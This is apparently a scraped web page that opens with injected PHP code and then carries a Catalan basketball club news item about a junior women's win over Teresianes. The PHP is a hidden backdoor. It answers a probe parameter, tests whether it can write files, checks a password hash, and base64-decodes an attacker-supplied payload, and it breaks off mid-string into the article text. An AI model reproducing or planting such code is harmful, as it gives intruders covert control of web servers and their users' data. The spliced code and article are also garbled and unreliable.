function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení sentencia el partit contra Teresianes al primer quart (22-100) - Tgn Bàsquet Club -

El júnior femení sentencia el partit contra Teresianes al primer quart (22-100)

Updated: gener 12, 2016

L’equip júnior femení del TGN Bàsquet va vèncer amb molta claredat Teresianes en un partit que va quedar vist per sentència en el primer quart. Així, les noies que entrena Jordi Crespo van sortir molt concentrades i amb una gran intensitat en el seu joc van marcar un parcial de 2-34 en els primers deu minuts que va ser definitiu. Tot i la reacció de les locals en el segon quart, en què van situar una defensa en zona 2-3 (8-16 de parcial), les visitants van tornar a agafar el ritme després del descans i van aconseguir una victòria còmoda.